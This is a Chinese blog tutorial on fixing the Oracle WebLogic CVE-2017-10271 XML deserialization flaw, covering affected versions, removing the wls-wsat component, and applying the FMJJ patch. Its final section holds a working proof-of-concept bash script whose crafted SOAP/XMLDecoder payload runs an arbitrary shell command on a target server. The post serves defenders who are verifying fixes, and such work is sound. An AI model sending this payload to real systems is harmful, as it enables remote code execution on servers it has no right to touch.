weblogic CVE-2017-10271修复教程

最新推荐文章于 2024-09-11 21:10:38 发布
最新推荐文章于 2024-09-11 21:10:38 发布
阅读量3.6k 收藏 3
点赞数 1
文章标签: 操作系统 数据库 java

1.简介

CVE-2017-10271是weblogic wls-wsat组件的一个xml反序列化漏洞,可造成远程命令执行。更详细分析可见参考链接,本文强调在进行参考链接修复中的一些细节。

 

2.影响版本

OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0

打了B25A及其之前版本的补丁都没用,需要打2017年10月的补丁(FMJJ)

(实际检测发现weblogic 10.3.5.0版本也存在该漏洞,但官方并没有指出该版本也未提供该版本的补丁下载,对于该版本只好使用下边的临时办法进行处理)

 

3.处理办法

3.1方法一:临时处理办法

删除wls-wsat组件,然后重启weblogic(weblogic安装路径和domain名等根据自己实际情况修改)

rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
cd /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/bin
./stopWebLogic.sh
./startWebLogic.sh &

说明:

1.一定要把前两个文件删掉再重启,只删其中一个或者删了一个重启后再删另外一个都是不能修复。原理上是在启动时1会复制到2,然后2会被缓存到内存(不是3)。如果只删除2那再启动时又复制回来显然没效果;如果只删除1那重启时2并不会被清除,所以还是没效果;如果重启完再删除由于已缓存到内存所以也没效果。缓存到内存只是我的猜测,因为实践测试就是启了再删漏洞还是未修复而在磁盘上又找不到vm-wsat组件在哪。

2.第三个文件不懂是什么只是各说明都要要删然后确实也是vm-wsat所以这里也删了,实践来看不删也修复了的。

3.删了这几个文件(夹)后需要重启才能生效。只删不重启效果和1中所说的重启了再删结果一样的,内存中还有缓存漏洞还是没修复。

4.vm-wsat在所有server都会部署,所以所有控制台和所有server都需要重启。

5.直接的验证方法是访问,http://192.168.220.128:9000/wls-wsat/CoordinatorPortType11(ip和端口改成自己的),如是404则说明已成功删除。如果类似下面结果则未成功删除

 

3.2方法二:打补丁

官网下载p26519424_1036_Generic.zip(FMJJ)打上即可(下载补丁需要登录账号,且该账号要已购买服务)

cd /home/WebLogic/Oracle/Middleware/utils/bsu  #进入bsu目录
mkdir -p cache_dir/backup                      #创建backup目录用于备份
mv cache_dir/* cache_dir/backup                #确保cache_dir下原来没有补丁
unzip p26519424_1036_Generic.zip -d /home/WebLogic/Oracle/Middleware/utils/bsu/cache_dir #将补丁解压到cache_dir
mv cache_dir/patch-catalog_25504.xml cache_dir/patch-catalog.xml       #重命名patch-catalog
./bsu.sh -install -patchlist=FMJJ -patch_download_dir=./cache_dir/ -prod_dir=../../wlserver_10.3/   #打FMJJ补丁

如果之前打了B25A等补丁直接打会报冲突Patch FMJJ is mutually exclusive and cannot coexist with patch(es): B25A,先将B25A等冲突的补丁卸载即可(weblogic新补丁包含之前补丁的更改可放心卸载)。

./bsu.sh -remove -patchlist=B25A  -prod_dir=../../wlserver_10.3/

说明:

1有人说要找windows版weblogic的补丁,实际操作来看windows和linux上的weblogic都用同一个补丁包的,并没有linux版补丁和windows版补丁的说法。

2关于打补丁时要不要停weblogic,按习惯是都先停了再打,但是按实际试验看不停就打除了打时服务可能会卡一点外功能也都正常。从原理上看,安装补丁的过程是归档有问题的文件然后使用新文件替代;卸载补丁的过程是移除该补丁相关的文件然后从归档文件中还原原先的文件,从这角度上看不会造成功能缺失。由于前述的缓存到内存所以功能未重启前功能也正常。

3打了补丁之后一样要重启weblogic才能生效,这是验证过的。

4打补丁后不要使用访问http://192.168.220.128:9000/wls-wsat/CoordinatorPortType11看是否存在来判断漏洞是否修复,补丁是从代码修复了漏洞而不是删除了CoordinatorPortType所以打补丁后这个页面肯定还是存在的。

 

4.POC

严谨的安全工作者,讲究“no exp say jb”,以下是一个linux shell版本,在本地CentOS服务器上验证通过

IP=192.168.220.128            #要检测的主机IP
PORT=9000                     #要检测的主机端口
COMMAND='find . -name "war" -exec touch {}/poc.jsp \;'    #此为要远程执行的命令;weblogic工作目录为domain目录,此句远程无差别地在所有war目录下创建poc.jsp文件

XML_PAYLOAD_PRE='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              '
XML_PAYLOAD_MID="<string>${COMMAND}</string>"       #由于没有找到更好的办法拼接,只要将payload先分割成了前中后三段

XML_PAYLOAD_POST='
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>'

XML_PAYLOAD="${XML_PAYLOAD_PRE}${XML_PAYLOAD_MID}${XML_PAYLOAD_POST}"   #拼接payload

echo "${XML_PAYLOAD}" | curl -X POST -H 'Content-type:text/xml' -d @-  http://$IP:$PORT/wls-wsat/CoordinatorPortType  #使用curl post提交payload

RESPOND_CODE=`curl -I -s -w "%{http_code}\n" -o /dev/null http://$IP:$PORT/wls-wsat/poc.jsp`     #访问poc文件,以其是否成功创建来判断命令是否成功执行

if [ $RESPOND_CODE == 200 ]
then
echo "RESPOND_CODE = ${RESPOND_CODE}, $IP:$PORT exist cve-2017-10271"
elif [ $RESPOND_CODE == 404 ]
then
echo "RESPOND_CODE = ${RESPOND_CODE}, $IP:$PORT do not exist cve-2017-10271"
else
echo "RESPOND_CODE = ${RESPOND_CODE}, i do not know what does it means"
fi

也可以到github上找找,看了一下意思都大同小异

https://github.com/search?utf8=%E2%9C%93&q=CVE-2017-10271&type=

 

参考:

http://www.cnvd.org.cn/webinfo/show/4331

http://blog.nsfocus.net/weblogic-solution/

http://blog.nsfocus.net/weblogic-xmldecoder-rce/

http://www.mamicode.com/info-detail-1367368.html
http://blog.csdn.net/hongweigg/article/details/77948664
https://www.cnblogs.com/jing1617/p/6442640.html

https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271

weixin_33811961
关注
Weblogic CVE-2017-10271漏洞复现
君莫hacker的博客
09-09 1524
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ
01-09
Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
(CVE-2017-10271)weblogic12.1.3.0漏洞测试与打补丁过程
weixin_30746117的博客
01-03 741
1、漏洞测试 搭建完成weblogic12.1.3.0后,开始用工具测试 点击connect,右下角显示connected,说明已连接→说明漏洞存在 CMD输入:ls ,然后点击Execute执行(因为环境是linux) 下图是对应环境服务器的。 2、打补丁 网上各种转来转去,参差不齐,好多说什么用bsu去打补丁,他们有些不知道,12.1.2后的版本都没有bsu这玩...
JBoss反序列化漏洞复现 CVE-2017-7504
最新发布
m0_62284238的博客
09-11 319
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。进入vulnhub目录下的jboss目录,进入CVE-2017-7504目录。访问靶机的8080端口。出现如下即为开启成功!
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
weblogic 补丁 反序列化补丁 。己已经打上补丁了。欢迎下载
linux winserver漏洞,Microsoft Windows SMB Server远程代码执行漏洞(CVE-2017-0148)
weixin_39876282的博客
05-16 1894
Microsoft Windows SMB Server远程代码执行漏洞(CVE-2017-0148)发布日期:2017-03-14更新日期:2017-04-18受影响系统:Microsoft Windows Vista SP2Microsoft Windows Server 2016Microsoft Windows Server 2012 Gold R2Microsoft Windows Se...
cve-201710271 XMLDecoder 反序列化漏洞 原理分析
whatday的专栏
07-31 1464
目录 1.漏洞背景 2.漏洞原理分析 3.漏洞测试 环境搭建 漏洞复现 4.修复建议 1.漏洞背景 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性,备受广大系统管理员的青睐。根据不完全统计weblogic约占全球市场份额1/3,正因为这么高的占有率,也造成每次weblogic有新的漏洞,都会在业内引起轩然大波。在2017年接近尾声时,weblogic又再次给大家带来了巨大惊喜,CV
weblogic 序列化漏洞 CVE-2017-10271 版本 12.1.3.0.0
01-23
weblogic 序列化漏洞 CVE-2017-10271 版本 12.1.3.0.0
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全...及时的漏洞检查和修复是防止此类攻击的关键步骤,而"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"这样的工具为安全管理人员提供了有力的辅助手段。
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
m0_66299232的博客
04-12 670
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。5.因为执行whoami是无回显的,所以需要借助dnslog.cn网站进行回显。
windows server 2012主机漏洞-复现-修复
weixin_42881032的博客
09-16 1万+
windows server 2012 目录windows server 2012Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)复现Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010) Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CV
关于禁用weblogic wls-wsat组件的步骤说明
09-03
WebLogic WLS组件漏洞,文档描述如何通过禁用组件的方式来修补漏洞
WeblogicCVE-2017-10271
01-03
weblogic打补丁操作步骤 主义更换路径!攻击者针对WebLogicWLS组件中存在的CVE-2017-10271远程代码执行漏洞,构造请求对运行的WebLogic中间件主机进行攻击,由于该漏洞利用方式简单,且能够直接获取目标服务器的控制权限,影响范围较广,近期发现此漏洞的利用方式为传播虚拟币挖矿程序,不排除会被黑客用于其他目的的攻击。
【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】
Shadow_DAI_990101的博客
08-31 1184
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复确保防病毒软件是最新的。实施数据备份和恢复计划,将敏感或专有数据的副本保存在单独且安全的位置。...
Weblogic(CVE-2017-10271)漏洞复现
01-05 2079
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271) 漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2....
weblogic(CVE-2017-10271CVE-2020-14882)、Jenkins(CVE-2018-1000861)、JBoss 5.x/6.x 反序列化漏洞
qq_55202378的博客
05-11 439
简介:的组件对外提供服务,其中使用了来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 kali开启4444端口: docker部署好环境后,直接访问,会出现404界面,表示weblogic已成功部署。 直接发送下面的数据包: jboss是一款java中间件,docker部署成功后,访问 编写反弹shell编码网址:runtime-exec 序列化数据生成 简要介绍:Jenkins可以被认为是一个Java中间件,它是用Java编写的开源软件,使用Java Servlet容
永恒之蓝漏洞(CVE-2017-0144)复现
LRainner的博客
03-04 4639
永恒之蓝漏洞(CVE-2017-0144)复现 环境搭建 一台kali攻击机 一台windows7靶机 信息收集 ifconfig 查看kali的ip地址为192.168.125.25 使用nmap扫描192.168.125.0网段下存活的主机 nmap 192.168.125.25/24 判断靶机ip地址为192.168.125.151 nmap -O 192.168.125.151 判断靶机为Windows 7|2008|8.1 使用永恒之蓝进行攻击 msfconsole进入metasploit控
XML Decoder反序列化漏洞(CVE-2017-10271
热门推荐
yumengzth的博客
07-27 1万+
0x00 漏洞产生的原因 CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 反序列化漏洞的原理与动态调试推荐链接 WebLogic XMLDeco...
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271
SoulCat
02-12 2605
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271) 漏洞概述: -该漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。 漏洞版本: 10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0 漏洞搭建...
CVE-2017-10271漏洞原理
07-09
CVE-2017-10271漏洞的原理涉及Oracle WebLogic Server中的一个组件,即WLS Security组件。该组件在处理用户输入时存在安全漏洞,使得攻击者可以通过构造恶意的HTTP请求来执行远程代码。 具体来说,该漏洞的原理是利用WebLogic Server上的一个组件(T3协议)中的反序列化漏洞。攻击者可以发送特制的HTTP请求,其中包含恶意的序列化数据。当WebLogic Server接收到这个请求并尝试反序列化数据时,由于未正确验证和过滤输入,攻击者可以在服务器上执行任意代码。 攻击者利用该漏洞可以完全控制受影响的WebLogic Server,并执行任意操作,包括获取敏感数据、修改系统配置、部署恶意代码等。因此,该漏洞被认为是非常严重的安全威胁,并且需要及时采取措施来修复和保护受影响的系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值